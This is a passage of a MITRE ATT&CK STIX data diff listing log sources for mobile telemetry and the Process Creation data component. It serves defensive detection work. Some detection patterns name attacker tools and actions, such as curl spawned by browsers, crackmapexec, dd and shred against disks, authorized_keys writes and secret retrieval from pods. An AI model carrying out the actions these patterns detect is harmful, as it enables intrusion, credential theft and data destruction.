+                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of AccountManager.getAccounts()"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-23 18:22:40.476000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0032",
+                            "external_id": "DC0032"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Creation",
+                    "description": "Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream 'eventMessage contains pubsub or broker'"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Execution of binary resolved from $PATH not located in /usr/bin or /bin"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution path inconsistent with baseline PATH directories"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4688"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl with suspicious arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve network tools"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to soffice.bin with suspicious macro execution flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution of Microsoft Word, Excel, PowerPoint with macro execution attempts"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process reading browser configuration paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec logs"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve: Processes launched with LD_PRELOAD/LD_LIBRARY_PATH pointing to non-system dirs"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: Process execution context for loaders calling dlopen/dlsym"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "EXECVE"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of unexpected binaries during user shell startup"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of Terminal.app or shell with non-standard environment setup"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC with unusual parent-child process relationships from zsh"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of systemctl or service stop"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of launchctl or pkill"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process::exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of klist, kinit, or tools interacting with ccache outside normal user context"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Execution of non-standard binaries accessing Kerberos APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Electron-based binary spawning shell or script interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Electron app spawning unexpected child process"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/root/.ash_history or /etc/init.d/*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls with high-frequency or known bandwidth-intensive tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or spawn calls to proxy tools or torrent clients"
+                        },
+                        {
+                            "name": "containers:osquery",
+                            "channel": "bandwidth-intensive command execution from within a container namespace"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process launch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --info --predicate 'subsystem == \"com.apple.cfprefsd\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security, sqlite3, or unauthorized binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected applications generating outbound DNS queries"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=1"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected child process of Safari or Chrome"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or syscall invoking vm artifact check commands (e.g., dmidecode, lspci, dmesg)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of system_profiler, ioreg, kextstat with argument patterns related to VM/sandbox checks"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process writes or modifies files in excluded paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.mail.* exec.*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of memory inspection tools (lldb, gdb, osqueryi)"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "/var/log/vobd.log"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "kubectl exec or kubelet API calls targeting running pods"
+                        },
+                        {
+                            "name": "docker:audit",
+                            "channel": "Process execution events within container namespace context"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "process persists beyond parent shell termination"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "background process persists beyond user logout"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of scripts or binaries sourced from mail directories (/var/mail, ~/Maildir)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Preview.app, Safari.app, or Mail.app spawning new processes outside normal patterns"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "process execution across cloud VM"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "systemctl spawning managed processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of processes linked to hijacked sessions (e.g., anomalous parent-child process lineage)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec events where web process starts a shell/tooling"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "Docker/Kubernetes audit of exec/attach (kubectl exec) or unexpected child processes inside container"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec of osascript, bash, curl with suspicious parameters"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of container management CLIs (docker, crictl, kubectl) or interpreted shells (sh, bash, python) within container context"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of discovery commands targeting backup binaries, processes, or config paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution logs showing discovery commands like mdfind, system_profiler, or launchctl list"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events OR launchd"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd or process_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process and file events via log stream"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of scripts or binaries spawned from browser processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Browser processes launching unexpected interpreters (osascript, bash)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of defaults, plutil, or common editors (vim/nano) targeting plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "EXECVE"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of bash, python, or perl processes spawned by browser/email client"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of osascript, bash, or Terminal initiated from Mail.app or Safari"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of /bin/sh,/bin/bash,/usr/bin/curl,/usr/bin/python by service accounts (e.g., apache, mysql, nobody) immediately after inbound network activity."
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "parent_name in ('sshd','httpd','screensharingd') spawning shells or scripting runtimes."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process activity stream"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "SYSCALL record where exe contains passwd/userdel/chage and auid != root"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Post-login execution of unrecognized child process from launchd or loginwindow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of base64|openssl|xxd|python|perl with arguments matching Base64 flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process command line contains base64, -enc, openssl enc -base64"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: arguments contain Base64-like strings"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "commands containing base64, openssl enc -base64, xxd -p"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of process launched via loginwindow session restore"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: exec + filewrite: ~/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "/var/log/containers/*.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Java apps or other processes with hidden window attributes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process Execution"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve on code or jetbrains-gateway with remote flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: code or jetbrains-gateway launching with --tunnel or --remote"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'processImagePath CONTAINS \"curl\" OR \"osascript\"'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd, shred, wipe targeting block devices"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of sleep or ping command within script interpreted by bash/python"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or socket/connect system calls from processes using crypto libraries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process using AES/RC4 routines unexpectedly"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "execution of known firewall binaries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "type=EXECVE or SYSCALL for /bin/date, /usr/bin/timedatectl, /sbin/hwclock, /bin/cat /etc/timezone, /bin/cat /proc/uptime"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "execve: command like 'date', 'timedatectl', 'hwclock', 'cat /etc/timezone'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process exec events of systemsetup, date, ioreg with command_line parameters indicating time discovery"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: binary == \"/usr/sbin/systemsetup\" and args contains \"-gettimezone\""
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: command LIKE '%systemsetup -gettimezone%' OR '%date%'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of osascript, curl, or unexpected automation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec /usr/bin/pwpolicy"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket(AF_PACKET|AF_INET, SOCK_RAW, *), setsockopt(\u2026 SO_ATTACH_FILTER|SO_ATTACH_BPF \u2026), bpf(cmd=BPF_PROG_LOAD), open/openat path=\"/dev/bpf*\" (BSD/macOS-like) or setcap cap_net_raw."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "KERN messages about eBPF program load/verify or LSM denials related to bpf."
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "open/openat of /dev/bpf*; ioctl BIOCSETF-like operations."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Exec of tcpdump, rvictl, custom tools linked to libpcap.A.dylib; sysextd/systemextensionsctl events for NetworkExtension content filters."
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "/usr/sbin/postfix, /usr/sbin/exim, /usr/sbin/sendmail"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of known flash tools (e.g., flashrom, fwupd)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.firmwareupdater activity or update-firmware binary invoked"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of system tools like dmidecode, lspci, lscpu, dmesg, systemd-detect-virt"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or spawn of 'system_profiler', 'ioreg', 'kextstat', 'sysctl', or calls to sysctl API"
+                        },
+                        {
+                            "name": "macos:endpointSecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Suspicious binaries or scripts interacting with authentication binaries (sshd, gdm, login)"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: Processes unexpectedly invoking Keychain or authentication APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: execve calls where a browser/webview process is parent and child is interpreter (python, sh, ruby) or downloader (curl, wget)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_create: Process creation where parent is Safari/Google Chrome and child is script interpreter or signed-but-unusual helper binary"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:launch"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Shell commands invoked by SQL process such as postgres, mysqld, or mariadbd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of smbclient, smbmap, rpcclient, nmblookup, crackmapexec smb"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: Process execution of \"sharing -l\", \"smbutil view\", \"mount_smbfs\""
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of scp, rsync, curl with remote destination"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "logMessage contains pbpaste or osascript"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call with argv matching known disk enumeration commands (lsblk, parted, fdisk)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process launch of diskutil or system_profiler with SPStorageDataType"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "execution of esxcli with args matching 'storage', 'filesystem', 'core device list'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail.app executing with parameters updating rules state"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/vmkernel.log, /var/log/vmkwarning.log"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec: Exec of ffmpeg, avfoundation-based binaries, or custom signed apps accessing camera"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "exec into pod followed by secret retrieval via API"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_name IN (\"VBoxManage\", \"prlctl\") AND command CONTAINS (\"list\", \"show\")"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec srm|exec openssl|exec gpg"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process execution with LD_PRELOAD or modified library path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of process with DYLD_INSERT_LIBRARIES set"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "process creation events linked to container namespaces executing host-level binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process and signing chain events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchservices events for misleading extensions"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Execution of disguised binaries"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process listening or connecting on non-standard ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd services binding to non-standard ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, connect"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "process or cron activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binaries with unsigned or anomalously signed certificates"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve logging for /usr/bin/systemctl and systemd-run"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Invocation of osascript or dylib injection"
